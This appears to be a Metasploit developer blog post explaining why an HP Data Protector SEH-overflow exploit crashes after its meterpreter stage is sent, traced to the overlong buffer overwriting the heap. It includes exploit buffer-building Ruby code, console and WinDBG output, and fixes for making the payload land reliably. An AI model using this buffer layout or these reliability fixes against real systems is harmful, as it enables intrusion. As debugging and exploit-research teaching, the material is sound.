Last year at BSides Vegas, James Lee (egypt) and David Rude (bannedit) gave a presentation called "Long Beard's Guide to Exploit Dev".  During the talk, James said one thing that I'll never forget: "exploit development is never an easy task, because pretty much every step you do -- finding the offset, finding a return value, using a ROP gadget, etc -- could lead to a failure." Ain't that the truth!  But here's the thing: exploits don't just fail before you pop a shell. They can also fail WHILE you're getting a shell... and that's where my story begins.

Let's say you're writing an exploit.  You've done all the hard work to put it all together: you spent days in a debugger doing some decent root cause analysis for the bug, you found all the bad characters, you bypassed memory protections such as /GS and SafeSEH, you ROP'd it like a ROP star, and you bypassed ASLR like a boss.  Your friends praise you for the accomplishment, and some people might even call your exploit "sophisticated"... and then all of a sudden, this is all the "code execution" you get out of your awesome exploit:

    msf  exploit(0day) > exploit
    [*] Server started.
    [*] Sending request to 10.0.1.4:80...
    [*] Leaked address: 0x61990000
    [*] Sending final payload...
    [*] Sending stage (752128 bytes) to 10.0.1.4

"Hey, WTH?", you say.  For some reason the exploit fails after you've sent the second stage to the vulnerable application, and then the server crashes (this is the key behavior).  You fire the module a couple of times just to make sure, but same thing.  Your shell keeps slipping away from your fingertips... what a nightmare!  This is a pretty nasty problem, because the root cause most likely comes from the exploit.  It also can be a hassle to fix, and you will see why when you see one of the solutions in the end.  But for now, I should probably explain why this is happening.

We ran into the same problem recently while developing the exploit for HP Data Protector, so I'll use that as a case study.  During a later stage of that module's development, the buffer was crafted this way:

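    # Build the egghunter stub and the tagged (egg) copy of the payload
    print_status("Using egghunter with checksum")
    hunter,egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true, :eggtag => 'w00t' })

    my_payload = egg
    # Pad up to the SEH record, then overwrite it
    my_payload << "A"*(target['Offset']-my_payload.length)
    my_payload << generate_seh_record(target.ret)
    # The egghunter sits right after the SEH record
    my_payload << hunter
    # Pad the whole buffer out to 4080 bytes
    my_payload << "A"*(4080-my_payload.length)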

As you can see, the max buffer size is 4080 bytes -- this is key.  When we fired up this module, we saw the same stage delivery message, and then hit this crash:

    0:008> r
    eax=03f664d4 ebx=3743fde1 ecx=0000c9ed edx=000c1000 esi=3743fdc9 edi=03f501a4
    eip=7c952d6b esp=019ed278 ebp=019ed2ec iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
    ntdll!RtlQueryProcessHeapInformation+0x2ba:
    7c952d6b 8b4e14          mov     ecx,dword ptr [esi+14h] ds:0023:3743fddd=????????
    0:008> k
    ChildEBP RetAddr
    019ed2ec 7c953341 ntdll!RtlQueryProcessHeapInformation+0x2ba
    019ed348 7c864afe ntdll!RtlQueryProcessDebugInformation+0x1ee
    019ed36c 03bd7e23 kernel32!Heap32First+0x48
    WARNING: Frame IP not in any known module. Following frames may be wrong.
    019edc2c 7c802600 0x3bd7e22
    019edc7c 00000000 kernel32!WaitForSingleObjectEx+0xd8

We should probably point out that ESI actually holds user-supplied data.  We were able to determine this because when we tested the module again with pattern_create() instead of a long string of "A"s, pattern_offset.rb was able to locate the value... exactly 38 bytes after the egghunter.  So the above WinDBG log shows that after the staged payload is delivered, there is some sort of heap corruption, and evidently our string has something to do with it.
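For readers who haven't used the pattern tools, here is a minimal Ruby sketch of the idea. It is a simplified stand-in, not Metasploit's own implementation: cyclic_pattern and cyclic_offset are hypothetical helper names, and the register value 0x41336141 is made up for the example.

```ruby
# Simplified stand-in for a cyclic pattern generator (hypothetical helper,
# not the Metasploit implementation). Emits "Aa0Aa1Aa2..." up to `length` bytes.
def cyclic_pattern(length)
  out = String.new
  ('A'..'Z').each do |upper|
    ('a'..'z').each do |lower|
      ('0'..'9').each do |digit|
        return out[0, length] if out.length >= length
        out << upper << lower << digit
      end
    end
  end
  out[0, length]
end

# Returns the byte offset of a 32-bit register value inside the pattern,
# or nil if the value is not part of it. x86 is little-endian, hence pack('V').
def cyclic_offset(pattern, register_value)
  pattern.index([register_value].pack('V'))
end

pattern = cyclic_pattern(4080)
# 0x41336141 is an illustrative value; in memory it reads as "Aa3A".
puts cyclic_offset(pattern, 0x41336141).inspect  # => 9
```

Because every short chunk of the pattern is distinct, whatever lands in a register tells you which part of your buffer it came from.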

Remember, this buffer overflow is supposed to be all stack smashing. But when we examined the memory more closely, comparing a non-crashy request against the crashy one, we found something interesting.  The following is the memory dump starting at the SEH record (the one we overwrite):

Stack from the healthy version of the exploit:

    0244ff9c  d64d06eb
    0244ffa0  66dd3e49  <-- SE Handler
    0244ffa4  ffca8166
    0244ffa8  6a52420f
    0244ffac  2ecd5802
    0244ffb0  745a053c
    0244ffb4  3077b8ef
    0244ffb8  d7897430
    0244ffbc  afea75af
    0244ffc0  3151e775
    0244ffc4  02c031c9
    0244ffc8  66410f04
    0244ffcc  013df981
    0244ffd0  043af575
    0244ffd4  d175590f
    0244ffd8  3077e7ff
    0244ffdc  ff007430
    0244ffe0  7c839ac0 kernel32!_except_handler3
    0244ffe4  7c80b720 kernel32!`string'+0x88
    0244ffe8  00000000
    0244ffec  00000000
    0244fff0  00000000
    0244fff4  1022db2c dpwinsup!Mbcsisupper+0x21d627
    0244fff8  019d75a0
    0244fffc  00000000  <-- Stack
    02450000  000000c1  <-- starting here is the heap
    02450004  0000017a
    02450008  eeffeeff
    0245000c  00001003
    02450010  00000001
    02450014  0000fe00
    02450018  00100000
    0245001c  00002000
    02450020  00000200
    02450024  00002000
    02450028  00001f6d
    0245002c  7ffdefff
    02450030  06080019

Stack from the non-healthy version of the exploit:

    0244ff9c  d64d06eb
    0244ffa0  66dd3e49  <-- SE Handler
    0244ffa4  ffca8166
    0244ffa8  6a52420f
    0244ffac  2ecd5802
    0244ffb0  745a053c
    0244ffb4  3077b8ef
    0244ffb8  d7897430
    0244ffbc  afea75af
    0244ffc0  3151e775
    0244ffc4  02c031c9
    0244ffc8  66410f04
    0244ffcc  013df981
    0244ffd0  043af575
    0244ffd4  d175590f
    0244ffd8  41414141
    0244ffdc  41414141
    0244ffe0  41414141
    0244ffe4  41414141
    0244ffe8  00000000
    0244ffec  00000000
    0244fff0  00000000
    0244fff4  41414141
    0244fff8  41414141
    0244fffc  04141414  <-- Still stack
    02450000  41414141  <-- starting here is the heap
    02450004  41414141
    02450008  41414141
    0245000c  41414141
    02450010  41414141
    02450014  41414141
    02450018  41414141
    0245001c  41414141
    02450020  41414141
    02450024  41414141
    02450028  41414141
    0245002c  41414141
    02450030  41414141

In case you haven't noticed, yes, while the exploit is overflowing the stack, it's also writing to the heap.  A simple !address command verifies this:

    0:010> !address 0244fffc
        02350000 : 02440000 - 00010000
                        Type     00020000 MEM_PRIVATE
                        Protect  00000004 PAGE_READWRITE
                        State    00001000 MEM_COMMIT
                        Usage    RegionUsageStack
                        Pid.Tid  69a0.6ac4
    0:010> !address 02450000
        02450000 : 02450000 - 00016000
                        Type     00020000 MEM_PRIVATE
                        Protect  00000004 PAGE_READWRITE
                        State    00001000 MEM_COMMIT
                        Usage    RegionUsageHeap
                        Handle   02450000
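The arithmetic behind that observation can be sketched in a few lines of Ruby. The two addresses come straight from the dumps above and will likely differ on another run or target; the helper names and the example SEH offset of 1000 are assumptions for illustration, since the module's real target['Offset'] isn't shown here.

```ruby
# Addresses taken from the debugger output above (specific to this run).
SEH_RECORD_ADDR = 0x0244ff9c  # where the overwritten SEH record starts
HEAP_BASE       = 0x02450000  # first address reported as RegionUsageHeap

# Number of bytes that can be written starting at write_addr before the
# write reaches heap_base.
def room_before_heap(write_addr, heap_base)
  heap_base - write_addr
end

# Longest buffer that stays out of the heap, given the offset of the SEH
# record inside the buffer (hypothetical parameter).
def max_safe_buffer_length(seh_offset, write_addr = SEH_RECORD_ADDR, heap_base = HEAP_BASE)
  seh_offset + room_before_heap(write_addr, heap_base)
end

puts room_before_heap(SEH_RECORD_ADDR, HEAP_BASE)  # => 100
puts max_safe_buffer_length(1000)                  # => 1100 (1000 is a made-up offset)
```

In other words, in this run only 100 bytes separate the start of the SEH record from the heap, so a buffer padded all the way to 4080 bytes has plenty of room to spill over.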

And the dt command shows just how corrupt the heap structure at 0x02450000 is:

    0:010> dt _HEAP 02450000
    ntdll!_HEAP
       +0x000 Entry            : _HEAP_ENTRY
       +0x008 Signature        : 0x41414141
       +0x00c Flags            : 0x41414141
       +0x010 ForceFlags       : 0x41414141
       +0x014 VirtualMemoryThreshold : 0x41414141
       +0x018 SegmentReserve   : 0x41414141
       +0x01c SegmentCommit    : 0x41414141
       +0x020 DeCommitFreeBlockThreshold : 0x41414141
       +0x024 DeCommitTotalFreeThreshold : 0x41414141
       +0x028 TotalFreeSize    : 0x41414141
       +0x02c MaximumAllocationSize : 0x41414141
       +0x030 ProcessHeapsListIndex : 0x4141
       +0x032 HeaderValidateLength : 0x4141
       +0x034 HeaderValidateCopy : 0x41414141
       +0x038 NextAvailableTagIndex : 0x4141
       +0x03a MaximumTagIndex  : 0x4141
       +0x03c TagEntries       : 0x41414141 _HEAP_TAG_ENTRY
       +0x040 UCRSegments      : 0x41414141 _HEAP_UCR_SEGMENT
       +0x044 UnusedUnCommittedRanges : 0x41414141 _HEAP_UNCOMMMTTED_RANGE
       +0x048 AlignRound       : 0x41414141
       +0x04c AlignMask        : 0x41414141
       +0x050 VirtualAllocdBlocks : _LIST_ENTRY [ 0x41414141 - 0x41414141 ]
       +0x058 Segments         : [64] 0x41414141 _HEAP_SEGMENT
       +0x158 u                : __unnamed
       +0x168 u2               : __unnamed
       +0x16a AllocatorBackTraceIndex : 0x4141
       +0x16c NonDedicatedListLength : 0x41414141
       +0x170 LargeBlocksIndex : 0x41414141
       +0x174 PseudoTagEntries : 0x41414141 _HEAP_PSEUDO_TAG_ENTRY
       +0x178 FreeLists        : [128] _LIST_ENTRY [ 0x41414141 - 0x41414141 ]
       +0x578 LockVariable     : (null)
       +0x57c CommitRoutine    : (null)
       +0x580 FrontEndHeap     : (null)
       +0x584 FrontHeapLockCount : 0
       +0x586 FrontEndHeapType : 0 ''
       +0x587 LastSegmentIndex : 0 ''

When the payload uses the heap, that's when we get the crash.  Based on our data, this crash tends to happen after the handler completes transmitting the payload (that's after recv), when the Tool Help functions end up using the bad heap (CreateToolhelp32Snapshot -> kernel32.Heap32ListFirst -> Heap32First, in particular), causing our meterpreter to crash.  We have also seen other behaviors that lead to the crash, but they all come down to much the same reason.

The Solutions

Now we know that in scenarios like this, the user-supplied buffer is highly likely to be the root cause of the problem.  In our case with HP Data Protector, the string is just way too long, and it's overwriting the heap.  We have seen a few proven solutions in the past, and here they are:

  • Avoid corrupting the heap by reducing your malicious string size.  This is the simplest approach and the first one you should try, but it may not always work for you because a smaller buffer may not even trigger the vulnerability you're exploiting.
  • Inject your payload somewhere else, where no heap is busted.  So far this technique has only been used once, and it was done by corelanc0d3r and lincoln.  This is similar to using the 'migrate' feature in meterpreter, except their injection routine runs before the actual Metasploit payload begins. You can read up more about this technique here.
  • Induce a heap pointer manually, for example: ms04_011_pct.rb
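As a rough illustration of the first option, here is a minimal Ruby sketch that rebuilds the same buffer layout with a caller-chosen cap in place of the hard-coded 4080. It is not the HP Data Protector module's code: build_buffer and its parameters are hypothetical, the strings in the usage lines are placeholders, and whether a shorter buffer still triggers the bug is something you have to test against the target.

```ruby
# Hypothetical helper: lays out egg + padding + SEH record + egghunter and
# pads only up to max_length, refusing to build anything longer.
def build_buffer(egg:, hunter:, seh_record:, seh_offset:, max_length:)
  raise ArgumentError, "egg does not fit before the SEH record" if egg.length > seh_offset

  buf = egg.b                               # binary-safe, mutable copy
  buf << "A" * (seh_offset - buf.length)    # pad up to the SEH record
  buf << seh_record.b                       # overwrite the SEH record
  buf << hunter.b                           # egghunter right after it

  if buf.length > max_length
    raise ArgumentError, "layout needs #{buf.length} bytes, cap is #{max_length}"
  end

  buf << "A" * (max_length - buf.length)    # trailing padding, capped
  buf
end

# Placeholder values, purely for illustration.
buf = build_buffer(egg: "w00tw00tPAYLOAD", hunter: "HUNT", seh_record: "NSEHSEH!",
                   seh_offset: 32, max_length: 64)
puts buf.length  # => 64
```

Making the cap an explicit parameter lets you lower it step by step until the heap stays intact, and the exception tells you right away when the cap is too small to hold the egg, the SEH record, and the egghunter.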

And hopefully one of the above recommendations will do the trick for you.

By the way, in case you're interested in Metasploit module development, make sure to create your development setup, and then join the sweet action of the Metasploit Project.  Github and Redmine often reveal a lot about how a module is made, and every exploit tends to be a unique story -- great places to begin your exploit development journey!